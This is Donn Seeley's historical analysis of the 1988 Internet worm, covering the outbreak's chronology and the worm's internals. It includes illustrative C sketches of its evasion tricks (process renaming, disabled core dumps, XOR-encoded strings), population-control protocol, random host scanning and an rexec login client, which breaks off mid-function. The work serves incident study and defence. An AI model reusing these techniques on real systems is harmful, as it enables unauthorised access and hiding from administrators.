A Tour of the Worm

Donn Seeley

Department of Computer Science
University of Utah

ABSTRACT

On the evening of November 2, 1988, a self-replicating program was released upon the Internet[1].  This program (a worm) invaded VAX and Sun-3 computers running versions of Berkeley UNIX, and used their resources to attack still more computers[2].  Within the space of hours this program had spread across the U.S., infecting hundreds or thousands of computers and making many of them unusable due to the burden of its activity.  This paper provides a chronology for the outbreak and presents a detailed description of the internals of the worm, based on a C version produced by decompiling.

1. Introduction

There is a fine line between helping administrators protect their systems and providing a cookbook for bad guys.  [Grampp and Morris, ``UNIX Operating System Security'']

November 3, 1988 is already coming to be known as Black Thursday.  System administrators around the country came to work on that day and discovered that their networks of computers were laboring under a huge load.  If they were able to log in and generate a system status listing, they saw what appeared to be dozens or hundreds of ``shell'' (command interpreter) processes.  If they tried to kill the processes, they found that new processes appeared faster than they could kill them.  Rebooting the computer seemed to have no effect--within minutes after starting up again, the machine was overloaded by these mysterious processes.

____________________
[1] The Internet is a logical network made up of many physical networks, all running the IP class of network protocols.
[2] VAX and Sun-3 are models of computers built by Digital Equipment Corp. and Sun Microsystems Inc., respectively.  UNIX is a Registered Bell of AT&T Trademark Laboratories.

These systems had been invaded by a worm.  A worm is a program that propagates itself across a network, using resources on one machine to attack other machines.  (A worm is not quite the same as a virus, which is a program fragment that inserts itself into other programs.)  The worm had taken advantage of lapses in security on systems that were running 4.2 or 4.3 BSD UNIX or derivatives like SunOS.  These lapses allowed it to connect to machines across a network, bypass their login authentication, copy itself and then proceed to attack still more machines.  The massive system load was generated by multitudes of worms trying to propagate the epidemic.

The Internet had never been attacked in this way before, although there had been plenty of speculation that an attack was in store.  Most system administrators were unfamiliar with the concept of worms (as opposed to viruses, which are a major affliction of the PC world) and it took some time before they were able to establish what was going on and how to deal with it.  This paper is intended to let people know exactly what happened and how it came about, so that they will be better prepared when it happens the next time.  The behavior of the worm will be examined in detail, both to show exactly what it did and didn't do, and to show the dangers of future worms.  The epigraph above is now ironic, for the author of the worm used information in that paper to attack systems.  Since the information is now well known, by virtue of the fact that thousands of computers now have copies of the worm, it seems unlikely that this paper can do similar damage, but it is definitely a troubling thought.  Opinions on this and other matters will be offered below.

2. Chronology

Remember, when you connect with another computer, you're connecting to every computer that computer has connected to.  [Dennis Miller, on NBC's Saturday Night Live]

Here is the gist of a message I got: I'm sorry.  [Andy Sudduth, in an anonymous posting to the TCP-IP list on behalf of the author of the worm, 11/3/88]

Many details of the chronology of the attack are not yet available.  The following list represents dates and times that we are currently aware of.  Times have all been rendered in Pacific Standard Time for convenience.

11/2: 1800 (approx.)
        This date and time were seen on worm files found on prep.ai.mit.edu, a VAX 11/750 at the MIT Artificial Intelligence Laboratory.  The files were removed later, and the precise time was lost.  System logging on prep had been broken for two weeks.  The system doesn't run accounting and the disks aren't backed up to tape: a perfect target.  A number of ``tourist'' users (individuals using public accounts) were reported to be active that evening.  These users would have appeared in the session logging, but see below.

11/2: 1824  First known West Coast infection: rand.org at Rand Corp. in Santa Monica.

11/2: 1904  csgw.berkeley.edu is infected.  This machine is a major network gateway at UC Berkeley.  Mike Karels and Phil Lapsley discover the infection shortly afterward.

11/2: 1954  mimsy.umd.edu is attacked through its finger server.  This machine is at the University of Maryland College Park Computer Science Department.

11/2: 2000 (approx.)
        Suns at the MIT AI Lab are attacked.

11/2: 2028  First sendmail attack on mimsy.

11/2: 2040  Berkeley staff figure out the sendmail and rsh attacks, notice telnet and finger peculiarities, and start shutting these services off.

11/2: 2049  cs.utah.edu is infected.  This VAX 8600 is the central Computer Science Department machine at the University of Utah.  The next several entries follow documented events at Utah and are representative of other infections around the country.

11/2: 2109  First sendmail attack at cs.utah.edu.

11/2: 2121  The load average on cs.utah.edu reaches 5.  The ``load average'' is a system-generated value that represents the average number of jobs in the run queue over the last minute; a load of 5 on a VAX 8600 noticeably degrades response times, while a load over 20 is a drastic degradation.  At 9 PM, the load is typically between 0.5 and 2.

11/2: 2141  The load average on cs.utah.edu reaches 7.

11/2: 2201  The load average on cs.utah.edu reaches 16.

11/2: 2206  The maximum number of distinct runnable processes (100) is reached on cs.utah.edu; the system is unusable.

11/2: 2220  Jeff Forys at Utah kills off worms on cs.utah.edu.  Utah Sun clusters are infected.

11/2: 2241  Re-infestation causes the load average to reach 27 on cs.utah.edu.

11/2: 2249  Forys shuts down cs.utah.edu.

11/2: 2321  Re-infestation causes the load average to reach 37 on cs.utah.edu, despite continuous efforts by Forys to kill worms.

11/2: 2328  Peter Yee at NASA Ames Research Center posts a warning to the TCP-IP mailing list: ``We are currently under attack from an Internet VIRUS.  It has hit UC Berkeley, UC San Diego, Lawrence Livermore, Stanford, and NASA Ames.''  He suggests turning off telnet, ftp, finger, rsh and SMTP services.  He does not mention rexec.  Yee is actually at Berkeley working with Keith Bostic, Mike Karels and Phil Lapsley.

11/3: 0034  At another's prompting, Andy Sudduth of Harvard anonymously posts a warning to the TCP-IP list: ``There may be a virus loose on the internet.''  This is the first message that (briefly) describes how the finger attack works, describes how to defeat the SMTP attack by rebuilding sendmail, and explicitly mentions the rexec attack.  Unfortunately Sudduth's message is blocked at relay.cs.net while that gateway is shut down to combat the worm, and it does not get delivered for almost two days.  Sudduth acknowledges authorship of the message in a subsequent message to TCP-IP on Nov. 5.

11/3: 0254  Keith Bostic sends a fix for sendmail to the newsgroup comp.bugs.4bsd.ucb-fixes and to the TCP-IP mailing list.  These fixes (and later ones) are also mailed directly to important system administrators around the country.

11/3: early morning
        The wtmp session log is mysteriously removed on prep.ai.mit.edu.

11/3: 0507  Edward Wang at Berkeley figures out and reports the finger attack, but his message doesn't come to Mike Karels' attention for 12 hours.

11/3: 0900  The annual Berkeley Unix Workshop commences at UC Berkeley.  40 or so important system administrators and hackers are in town to attend, while disaster erupts at home.  Several people who had planned to fly in on Thursday morning are trapped by the crisis.  Keith Bostic spends much of the day on the phone at the Computer Systems Research Group offices answering calls from panicked system administrators from around the country.

11/3: 1500 (approx.)
        The team at MIT Athena calls Berkeley with an example of how the finger server bug works.

11/3: 1626  Dave Pare arrives at Berkeley CSRG offices; disassembly and decompiling start shortly afterward using Pare's special tools.

11/3: 1800 (approx.)
        The Berkeley group sends out for calzones.  People arrive and leave; the offices are crowded, there's plenty of excitement.  Parallel work is in progress at MIT Athena; the two groups swap code.

11/3: 1918  Keith Bostic posts a fix for the finger server.

11/4: 0600  Members of the Berkeley team, with the worm almost completely disassembled and largely decompiled, finally take off for a couple hours' sleep before returning to the workshop.

11/4: 1236  Theodore Ts'o of Project Athena at MIT publicly announces that MIT and Berkeley have completely disassembled the worm.

11/4: 1700 (approx.)
        A short presentation on the worm is made at the end of the Berkeley UNIX Workshop.

11/8:       National Computer Security Center meeting to discuss the worm.  There are about 50 attendees.

11/11: 0038 Fully decompiled and commented worm source is installed at Berkeley.

3. Overview

What exactly did the worm do that led it to cause an epidemic?  The worm consists of a 99-line bootstrap program written in the C language, plus a large relocatable object file that comes in VAX and Sun-3 flavors.  Internal evidence showed that the object file was generated from C sources, so it was natural to decompile the binary machine language into C; we now have over 3200 lines of commented C code which recompiles and is mostly complete.  We shall start the tour of the worm with a quick overview of the basic goals of the worm, followed by discussion in depth of the worm's various behaviors as revealed by decompilation.

The activities of the worm break down into the categories of attack and defense.  Attack consists of locating hosts (and accounts) to penetrate, then exploiting security holes on remote systems to pass across a copy of the worm and run it.  The worm obtains host addresses by examining the system tables /etc/hosts.equiv and /.rhosts, user files like .forward and .rhosts, dynamic routing information produced by the netstat program, and finally randomly generated host addresses on local networks.  It ranks these by order of preference, trying a file like /etc/hosts.equiv first because it contains names of local machines that are likely to permit unauthenticated connections.  Penetration of a remote system can be accomplished in any of three ways.  The worm can take advantage of a bug in the finger server that allows it to download code in place of a finger request and trick the server into executing it.  The worm can use a ``trap door'' in the sendmail SMTP mail service, exercising a bug in the debugging code that allows it to execute a command interpreter and download code across a mail connection.  If the worm can penetrate a local account by guessing its password, it can use the rexec and rsh remote command interpreter services to attack hosts that share that account.  In each case the worm arranges to get a remote command interpreter which it can use to copy over, compile and execute the 99-line bootstrap.  The bootstrap sets up its own network connection with the local worm and copies over the other files it needs, and using these pieces a remote worm is built and the infection procedure starts over again.

Defense tactics fall into three categories: preventing the detection of intrusion, inhibiting the analysis of the program, and authenticating other worms.  The worm's simplest means of hiding itself is to change its name.  When it starts up, it clears its argument list and sets its zeroth argument to sh, allowing it to masquerade as an innocuous command interpreter.  It uses fork() to change its process I.D., never staying too long at one I.D.  These two tactics are intended to disguise the worm's presence on system status listings.  The worm tries to leave as little trash lying around as it can, so at start-up it reads all its support files into memory and deletes the tell-tale filesystem copies.  It turns off the generation of core files, so if the worm makes a mistake, it doesn't leave evidence behind in the form of core dumps.  The latter tactic is also designed to block analysis of the program--it prevents an administrator from sending a software signal to the worm to force it to dump a core file.  There are other ways to get a core file, however, so the worm carefully alters character data in memory to prevent it from being extracted easily.  Copies of disk files are encoded by repeatedly exclusive-or'ing a ten-byte code sequence; static strings are encoded byte-by-byte by exclusive-or'ing with the hexadecimal value 81, except for a private word list which is encoded with hexadecimal 80 instead.  If the worm's files are somehow captured before the worm can delete them, the object files have been loaded in such a way as to remove most non-essential symbol table entries, making it harder to guess at the purposes of worm routines from their names.  The worm also makes a trivial effort to stop other programs from taking advantage of its communications; in theory a well-prepared site could prevent infection by sending messages to ports that the worm was listening on, so the worm is careful to test connections using a short exchange of random ``magic numbers''.

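To make the string encoding concrete, here is a minimal sketch of the byte-by-byte exclusive-or scheme used for static strings.  The routine name and the sample string are our own inventions for illustration; they are not taken from the worm.

    #include <stdio.h>

    /* Decode (or encode -- XOR is its own inverse) a string that has
     * been obfuscated by XORing every byte with a one-byte key such
     * as 0x81.  A sketch only; the worm's actual routines differ. */
    static void
    xorstring(char *s, int len, unsigned char key)
    {
        int i;

        for (i = 0; i < len; i++)
            s[i] ^= key;
    }

    int
    main(void)
    {
        char msg[] = "/etc/hosts.equiv";   /* sample string, not the worm's */
        int len = sizeof(msg) - 1;

        xorstring(msg, len, 0x81);         /* now unreadable in a memory dump */
        xorstring(msg, len, 0x81);         /* decode again before use */
        printf("%s\n", msg);
        return 0;
    }
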
When studying a tricky program like this, it's just as important to establish what the program does not do as what it does do.  The worm does not delete a system's files: it only removes files that it created in the process of bootstrapping.  The program does not attempt to incapacitate a system by deleting important files, or indeed any files.  It does not remove log files or otherwise interfere with normal operation other than by consuming system resources.  The worm does not modify existing files: it is not a virus.  The worm propagates by copying itself and compiling itself on each system; it does not modify other programs to do its work for it.  Due to its method of infection, it can't count on sufficient privileges to be able to modify programs.  The worm does not install trojan horses: its method of attack is strictly active, it never waits for a user to trip over a trap.  Part of the reason for this is that the worm can't afford to waste time waiting for trojan horses--it must reproduce before it is discovered.  Finally, the worm does not record or transmit decrypted passwords: except for its own static list of favorite passwords, the worm does not propagate cracked passwords on to new worms nor does it transmit them back to some home base.  This is not to say that the accounts that the worm penetrated are secure merely because the worm did not tell anyone what their passwords were, of course--if the worm can guess an account's password, certainly others can too.  The worm does not try to capture superuser privileges: while it does try to break into accounts, it doesn't depend on having particular privileges to propagate, and never makes special use of such privileges if it somehow gets them.  The worm does not propagate over uucp or X.25 or DECNET or BITNET: it specifically requires TCP/IP.  The worm does not infect System V systems unless they have been modified to use Berkeley network programs like sendmail, fingerd and rexec.

4. Internals

Now for some details: we shall follow the main thread of control in the worm, then examine some of the worm's data structures before working through each phase of activity.

4.1. The thread of control

When the worm starts executing in main(), it takes care of some initializations, some defense and some cleanup.  The very first thing it does is to change its name to sh.  This shrinks the window during which the worm is visible in a system status listing as a process with an odd name like x9834753.  It then initializes the random number generator, seeding it with the current time, turns off core dumps, and arranges to die when remote connections fail.  With this out of the way, the worm processes its argument list.  It first looks for an option -p $$, where $$ represents the process I.D. of its parent process; this option indicates to the worm that it must take care to clean up after itself.  It proceeds to read in each of the files it was given as arguments; if cleaning up, it removes each file after it reads it.  If the worm wasn't given the bootstrap source file l1.c as an argument, it exits silently; this is perhaps intended to slow down people who are experimenting with the worm.  If cleaning up, the worm then closes its file descriptors, temporarily cutting itself off from its remote parent worm, and removes some files.  (One of these files, /tmp/.dumb, is never created by the worm and the unlinking seems to be left over from an earlier stage of development.)  The worm then zeroes out its argument list, again to foil the system status program ps.  The next step is to initialize the worm's list of network interfaces; these interfaces are used to find local networks and to check for alternate addresses of the current host.  Finally, if cleaning up, the worm resets its process group and kills the process that helped to bootstrap it.  The worm's last act in main() is to call a function we named doit(), which contains the main loop of the worm.

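The start-up defenses are ordinary enough that they can be sketched in a few lines of C.  The fragment below is our own reconstruction of the general technique (renaming the process, seeding the random number generator and disabling core dumps), not text from the decompiled worm.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <time.h>
    #include <sys/time.h>
    #include <sys/resource.h>

    int
    main(int argc, char **argv)
    {
        int i;
        struct rlimit rl;

        /* Masquerade in system status listings: clear the visible
         * argument strings and claim to be the shell.  (The new name
         * must fit in the space the old one occupied.) */
        for (i = argc - 1; i > 0; i--)
            memset(argv[i], 0, strlen(argv[i]));
        if (strlen(argv[0]) >= strlen("sh"))
            strcpy(argv[0], "sh");

        /* Seed the random number generator with the current time. */
        srandom((unsigned) time(NULL));

        /* Turn off core dumps so that a crash, or a signal sent by a
         * suspicious administrator, leaves no core file behind. */
        rl.rlim_cur = 0;
        rl.rlim_max = 0;
        setrlimit(RLIMIT_CORE, &rl);

        /* The worm would now process its -p option and file arguments,
         * read and unlink its support files, and call doit(). */
        return 0;
    }
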
doit() runs a short prologue before actually starting the main loop.  It (redundantly) seeds the random number generator with the current time, saving the time so that it can tell how long it has been running.  The worm then attempts its first infection.  It initially attacks gateways that it found with the netstat network status program; if it can't infect one of these hosts, then it checks random host numbers on local networks, then it tries random host numbers on networks that are on the far side of gateways, in each case stopping if it succeeds.  (Note that this sequence of attacks differs from the sequence the worm uses after it has entered the main loop.)

After this initial attempt at infection, the worm calls the routine checkother() to check for another worm already on the local machine.  In this check the worm acts as a client to an existing worm which acts as a server; they may exchange ``population control'' messages, after which one of the two worms will eventually shut down.

_________________________________________________________________

doit() {
        seed the random number generator with the time
        attack hosts: gateways, local nets, remote nets
        checkother();
        send_message();
        for (;;) {
                cracksome();
                other_sleep(30);
                cracksome();
                change our process ID
                attack hosts: gateways, known hosts,
                        remote nets, local nets
                other_sleep(120);
                if 12 hours have passed,
                        reset hosts table
                if (pleasequit && nextw > 10)
                        exit(0);
        }
}

``C'' pseudo-code for the doit() function
_________________________________________________________________

One odd routine is called just before entering the main loop.  We named this routine send_message(), but it really doesn't send anything at all.  It looks like it was intended to cause 1 in 15 copies of the worm to send a 1-byte datagram to a port on the host ernie.berkeley.edu, which is located in the Computer Science Department at UC Berkeley.  It has been suggested that this was a feint, designed to draw attention to ernie and away from the author's real host.  Since the routine has a bug (it sets up a TCP socket but tries to send a UDP packet), nothing gets sent at all.  It's possible that this was a deeper feint, designed to be uncovered only by decompilers; if so, this wouldn't be the only deliberate impediment that the author put in our way.  In any case, administrators at Berkeley never detected any process listening at port 11357 on ernie, and we found no code in the worm that listens at that port, regardless of the host.

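The nature of the bug is easy to demonstrate.  The fragment below, again our own reconstruction rather than the worm's code, creates a stream (TCP) socket and then tries to fire a single datagram at it with sendto(); the call fails, so nothing ever reaches the network.

    #include <stdio.h>
    #include <string.h>
    #include <signal.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    int
    main(void)
    {
        int s;
        char byte = 0;
        struct sockaddr_in sin;

        signal(SIGPIPE, SIG_IGN);           /* so the failure is visible */

        /* A stream (TCP) socket where a datagram (UDP) socket was wanted. */
        s = socket(AF_INET, SOCK_STREAM, 0);

        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(11357);                  /* port named in the text */
        sin.sin_addr.s_addr = inet_addr("127.0.0.1"); /* placeholder address */

        /* sendto() on an unconnected stream socket cannot succeed ... */
        if (sendto(s, &byte, 1, 0, (struct sockaddr *) &sin, sizeof(sin)) < 0)
            perror("sendto");                         /* ... so nothing is sent */
        return 0;
    }
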
The main loop begins with a call to a function named cracksome() for some password cracking.  Password cracking is an activity that the worm is constantly working at in an incremental fashion.  It takes a break for 30 seconds to look for intruding copies of the worm on the local host, and then goes back to cracking.  After this session, it forks (creates a new process running with a copy of the same image) and the old process exits; this serves to turn over process I.D. numbers and makes it harder to track the worm with the system status program ps.  At this point the worm goes back to its infectious stage, trying (in order of preference) gateways, hosts listed in system tables like /etc/hosts.equiv, random host numbers on the far side of gateways and random hosts on local networks.  As before, if it succeeds in infecting a new host, it marks that host in a list and leaves the infection phase for the time being.  After infection, the worm spends two minutes looking for new local copies of the worm again; this is done here because a newly infected remote host may try to reinfect the local host.  If 12 hours have passed and the worm is still alive, it assumes that it has had bad luck due to networks or hosts being down, and it reinitializes its table of hosts so that it can start over from scratch.  At the end of the main loop the worm checks to see if it is scheduled to die as a result of its population control features, and if it is, and if it has done a sufficient amount of work cracking passwords, it exits.

4.2. Data structures

The worm maintains at least four interesting data structures, and each is associated with a set of support routines.

The object structure is used to hold copies of files.  Files are encrypted using the function xorbuf() while in memory, so that dumps of the worm won't reveal anything interesting.  The files are copied to disk on a remote system before starting a new worm, and new worms read the files into memory and delete the disk copies as part of their start-up duties.  Each structure contains a name, a length and a pointer to a buffer.  The function getobjectbyname() retrieves a pointer to a named object structure; for some reason, it is only used to call up the bootstrap source file.

The interface structure contains information about the current host's network interfaces.  This is mainly used to check for local attached networks.  It contains a name, a network address, a subnet mask and some flags.  The interface table is initialized once at start-up time.

The host structure is used to keep track of the status and addresses of hosts.  Hosts are added to this list dynamically, as the worm encounters new sources of host names and addresses.  The list can be searched for a particular address or name, with an option to insert a new entry if no matching entry is found.  Flag bits are used to indicate whether the host is a gateway, whether it was found in a system table like /etc/hosts.equiv, whether the worm has found it impossible to attack the host for some reason, and whether the host has already been successfully infected.  The bits for ``can't infect'' and ``infected'' are cleared every 12 hours, and low priority hosts are deleted, to be accumulated again later.  The structure contains up to 12 names (aliases) and up to 6 distinct network addresses for each host.

In our sources, what we've called the muck structure is used to keep track of accounts for the purpose of password cracking.  (It was awarded the name muck for sentimental reasons, although pw or acct might be more mnemonic.)  Each structure contains an account name, an encrypted password, a decrypted password (if available) plus the home directory and personal information fields from the password file.

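To give a feel for the shapes involved, here is a rough C rendering of two of these structures.  The field names, sizes and flag values are our own guesses based on the descriptions above, not declarations from our decompiled sources.

    /* Holds an in-memory (and XOR-encoded) copy of one support file. */
    struct object {
        char   *name;               /* file name, e.g. the bootstrap source */
        long    size;               /* length of the buffer in bytes */
        char   *buf;                /* encoded contents */
    };

    /* One known host; the worm keeps a dynamic list of these. */
    #define MAXALIASES    12        /* up to 12 names per host */
    #define MAXADDRS       6        /* up to 6 network addresses per host */

    #define HF_GATEWAY    0x01      /* came from the netstat gateway list */
    #define HF_SYSTEM     0x02      /* found in /etc/hosts.equiv or the like */
    #define HF_CANTINFECT 0x04      /* attacks have failed; leave it alone */
    #define HF_INFECTED   0x08      /* a worm is already running there */

    struct host {
        unsigned long addrs[MAXADDRS];    /* network addresses */
        char   *names[MAXALIASES];        /* host name and aliases */
        int     flags;                    /* HF_* bits above */
        struct host *next;                /* assumed: a simple linked list */
    };
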
4.3. Population growth

The worm contains a mechanism that seems to be designed to limit the number of copies of the worm running on a given system, but beyond that our current understanding of the design goals is itself limited.  It clearly does not prevent a system from being overloaded, although it does appear to pace the infection so that early copies can go undetected.  It has been suggested that a simulation of the worm's population control features might reveal more about its design, and we are interested in writing such a simulation.

The worm uses a client-and-server technique to control the number of copies executing on the current machine.  A routine checkother() is run at start-up time.  This function tries to connect to a server listening at TCP port 23357.  The connection attempt returns immediately if no server is present, but blocks if one is available and busy; a server worm periodically runs its server code during time-consuming operations so that the queue of connections does not grow large.  After the client exchanges magic numbers with the server as a trivial form of authentication, the client and the server roll dice to see who gets to survive.  If the exclusive-or of the respective low bits of the client's and the server's random numbers is 1, the server wins, otherwise the client wins.  The loser sets a flag pleasequit that eventually allows it to exit at the bottom of the main loop.  If at any time a problem occurs--a read from the server fails, or the wrong magic number is returned--the client worm returns from the function, becoming a worm that never acts as a server and hence does not engage in population control.  Perhaps as a precaution against a cataleptic server, a test at the top of the function causes 1 in 7 worms to skip population control.  Thus the worm finishes the population game in checkother() in one of three states: scheduled to die after some time, with pleasequit set; running as a server, with the possibility of losing the game later; and immortal, safe from the gamble of population control.

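The client's half of this exchange can be sketched as follows.  This is a paraphrase of the protocol as we understand it; the magic number, the error handling and the details of the exchange are placeholders rather than values taken from the worm.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    int pleasequit = 0;              /* set when this copy has lost the game */

    void
    checkother_sketch(void)
    {
        int s;
        long mine, theirs, my_roll, his_roll;
        struct sockaddr_in sin;

        s = socket(AF_INET, SOCK_STREAM, 0);
        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(23357);                  /* the worm's port */
        sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK); /* the local machine */

        /* No server listening?  Then there is no other worm; just return. */
        if (connect(s, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
            close(s);
            return;
        }

        /* Trade ``magic numbers'' as a trivial authentication step.  Any
         * failure makes this copy give up on population control entirely. */
        mine = htonl(0x12345678);                     /* placeholder value */
        if (write(s, &mine, sizeof(mine)) != sizeof(mine) ||
            read(s, &theirs, sizeof(theirs)) != sizeof(theirs)) {
            close(s);
            return;
        }

        /* Both sides roll dice; the XOR of the low bits picks the winner. */
        my_roll = random();
        write(s, &my_roll, sizeof(my_roll));
        if (read(s, &his_roll, sizeof(his_roll)) != sizeof(his_roll)) {
            close(s);
            return;
        }
        if (((my_roll ^ his_roll) & 1) == 1)
            pleasequit = 1;          /* the server wins; schedule our exit */
        close(s);
    }
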
A complementary routine other_sleep() executes the server function.  It is passed a time in seconds, and it uses the Berkeley select() system call to wait for that amount of time accepting connections from clients.  On entry to the function, it tests to see whether it has a communications port with which to accept connections; if not, it simply sleeps for the specified amount of time and returns.  Otherwise it loops on select(), decrementing its time remaining after serving a client until no more time is left and the function returns.  When the server acquires a client, it performs the inverse of the client's protocol, eventually deciding whether to proceed or to quit.  other_sleep() is called from many different places in the code, so that clients are not kept waiting too long.

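A skeleton of such a timed server loop, once again our own sketch rather than decompiled code, looks something like this; serve_client() stands for the server's half of the protocol sketched above.

    #include <stdio.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/time.h>
    #include <sys/socket.h>

    /* Wait up to "how_long" seconds, serving any population-control
     * clients that connect on listen_fd in the meantime. */
    void
    other_sleep_sketch(int listen_fd, int how_long)
    {
        fd_set fds;
        struct timeval before, after, timeout;
        int client;

        if (listen_fd < 0) {         /* no server port: just sleep */
            sleep(how_long);
            return;
        }
        while (how_long > 0) {
            FD_ZERO(&fds);
            FD_SET(listen_fd, &fds);
            timeout.tv_sec = how_long;
            timeout.tv_usec = 0;

            gettimeofday(&before, NULL);
            if (select(listen_fd + 1, &fds, NULL, NULL, &timeout) > 0) {
                client = accept(listen_fd, NULL, NULL);
                if (client >= 0) {
                    /* serve_client(client);   play the server side here */
                    close(client);
                }
            }
            gettimeofday(&after, NULL);
            how_long -= after.tv_sec - before.tv_sec;   /* charge elapsed time */
        }
    }
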
Given the worm's elaborate scheme for controlling re-infection, what led it to reproduce so quickly on an individual machine that it could swamp it?  One culprit is the 1 in 7 test in checkother(): worms that skip the client phase become immortal, and thus don't risk being eliminated by a roll of the dice.  Another source of system loading is the problem that when a worm decides it has lost, it can still do a lot of work before it actually exits.  The client routine isn't even run until the newly born worm has attempted to infect at least one remote host, and even if a worm loses the roll, it continues executing to the bottom of the main loop, and even then it won't exit unless it has gone through the main loop several times, limited by its progress in cracking passwords.  Finally, new worms lose all of the history of infection that their parents had, so the children of a worm are constantly trying to re-infect the parent's host, as well as the other children's hosts.  Put all of these factors together and it comes as no surprise that within an hour or two after infection, a machine may be entirely devoted to executing worms.

4.4. Locating new hosts to infect

One of the characteristics of the worm is that all of its attacks are active, never passive.  A consequence of this is that the worm can't wait for a user to take it over to another machine like gum on a shoe--it must search out hosts on its own.

The worm has a very distinct list of priorities when hunting for hosts.  Its favorite hosts are gateways; the hg() routine tries to infect each of the hosts it believes to be gateways.  Only when all of the gateways are known to be infected or infection-proof does the worm go on to other hosts.  hg() calls the rt_init() function to get a list of gateways; this list is derived by running the netstat network status program and parsing its output.  The worm is careful to skip the loopback device and any local interfaces (in the event that the current host is a gateway); when it finishes, it randomizes the order of the list and adds the first 20 gateways to the host table to speed up the initial searches.  It then tries each gateway in sequence until it finds a host that can be infected, or it runs out of hosts.

After taking care of gateways, the worm's next priority is hosts whose names were found in a scan of system files.  At the start of password cracking, the files /etc/hosts.equiv (which contains names of hosts to which the local host grants user permissions without authentication) and /.rhosts (which contains names of hosts from which the local host permits remote privileged logins) are examined, as are all users' .forward files (which list hosts to which mail is forwarded from the current host).  These hosts are flagged so that they can be scanned earlier than the rest.  The hi() function is then responsible for attacking these hosts.

When the most profitable hosts have been used up, the worm starts looking for hosts that aren't recorded in files.  The routine hl() checks local networks: it runs through the local host's addresses, masking off the host part and substituting a random value.  ha() does the same job for remote hosts, checking alternate addresses of gateways.  Special code handles the ARPAnet practice of putting the IMP number in the low host bits and the actual IMP port (representing the host) in the high host bits.  The function that runs these random probes, which we named hack_netof(), seems to have a bug that prevents it from attacking hosts on local networks; this may be due to our own misunderstanding, of course, but in any case the check of hosts from system files should be sufficient to cover all or nearly all of the local hosts anyway.

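As an illustration of what ``masking off the host part and substituting a random value'' amounts to, the fragment below builds a candidate address from an interface address and its netmask.  It is a sketch of the idea, not the worm's hack_netof().

    #include <stdio.h>
    #include <stdlib.h>
    #include <arpa/inet.h>

    /* Given an interface address and netmask (both in host byte order),
     * return a random address on the same network. */
    unsigned long
    random_host_on_net(unsigned long ifaddr, unsigned long netmask)
    {
        unsigned long net  = ifaddr & netmask;       /* keep the network part */
        unsigned long host = random() & ~netmask;    /* random host part */

        if (host == 0)                               /* avoid the network address */
            host = 1;
        return net | host;
    }

    int
    main(void)
    {
        /* Example: a class C sized subnet; the addresses are placeholders. */
        unsigned long addr = random_host_on_net(0xc0a80105UL, 0xffffff00UL);
        struct in_addr in;

        in.s_addr = htonl(addr);
        printf("candidate: %s\n", inet_ntoa(in));
        return 0;
    }
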
Password cracking is another generator of host names, but since this is handled separately from the usual host attack scheme presented here, it will be discussed below with the other material on passwords.

4.5. Security holes

The first fact to face is that Unix was not developed with security, in any realistic sense, in mind...  [Dennis Ritchie, ``On the Security of Unix'']

This section discusses the TCP services used by the worm to penetrate systems.  It's a touch unfair to use the quote above when the implementation of the services we're about to discuss was distributed by Berkeley rather than Bell Labs, but the sentiment is appropriate.  For a long time the balance between security and convenience on Unix systems has been tilted in favor of convenience.  As Brian Reid has said about the break-in at Stanford two years ago: ``Programmer convenience is the antithesis of security, because it is going to become intruder convenience if the programmer's account is ever compromised.''  The lesson from that experience seems to have been forgotten by most people, but not by the author of the worm.

4.5.1. Rsh and rexec

These notes describe how the design of TCP/IP and the 4.2BSD implementation allow users on untrusted and possibly very distant hosts to masquerade as users on trusted hosts.  [Robert T. Morris, ``A Weakness in the 4.2BSD Unix TCP/IP Software'']

Rsh and rexec are network services which offer remote command interpreters.  Rexec uses password authentication; rsh relies on a ``privileged'' originating port and permissions files.  Two vulnerabilities are exploited by the worm--the likelihood that a remote machine that has an account for a local user will have the same password as the local account, allowing penetration through rexec, and the likelihood that such a remote account will include the local host in its rsh permissions files.  Both of these vulnerabilities are really problems with laxness or convenience for users and system administrators rather than actual bugs, but they represent avenues for infection just like inadvertent security bugs.

The first use of rsh by the worm is fairly simple: it looks for a remote account with the same name as the one that is (unsuspectingly) running the worm on the local machine.  This test is part of the standard menu of hacks conducted for each host; if it fails, the worm falls back upon finger, then sendmail.  Many sites, including Utah, already were protected from this trivial attack by not providing remote shells for pseudo-users like daemon or nobody.

A more sophisticated use of these services is found in the password cracking routines.  After a password is successfully guessed, the worm immediately tries to penetrate remote hosts associated with the broken account.  It reads the user's .forward file (which contains an address to which mail is forwarded) and .rhosts file (which contains a list of hosts and optionally user names on those hosts which are granted permission to access the local machine with rsh, bypassing the usual password authentication), trying these hostnames until it succeeds.  Each target host is attacked in two ways.  The worm first contacts the remote host's rexec server and sends it the account name found in the .forward or .rhosts files followed by the guessed password.  If this fails, the worm connects to the local rexec server with the local account name and uses that to contact the target's rsh server.  The remote rsh server will permit the connection provided the name of the local host appears in either the /etc/hosts.equiv file or the user's private .rhosts file.

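For readers unfamiliar with rexec, the client's side of the protocol is simple enough to sketch.  The server listening at TCP port 512 reads a NUL-terminated stderr port number, user name, password and command, and answers with a zero byte on success.  The code below is our own illustration rather than the worm's routine; the error handling is minimal and the caller supplies the (guessed) password.

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    /* Sketch of an rexec client request; returns a socket connected to
     * the remote command on success, -1 on failure. */
    int
    rexec_sketch(const char *hostaddr, const char *user,
                 const char *passwd, const char *cmd)
    {
        int s;
        char answer;
        struct sockaddr_in sin;

        s = socket(AF_INET, SOCK_STREAM, 0);
        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(512);                /* the rexec (exec) service */
        sin.sin_addr.s_addr = inet_addr(hostaddr);
        if (connect(s, (struct sockaddr *) &sin, sizeof(sin)) < 0)
            return -1;

        write(s, "", 1);                          /* no separate stderr port */
        write(s, user, strlen(user) + 1);         /* account name, NUL included */
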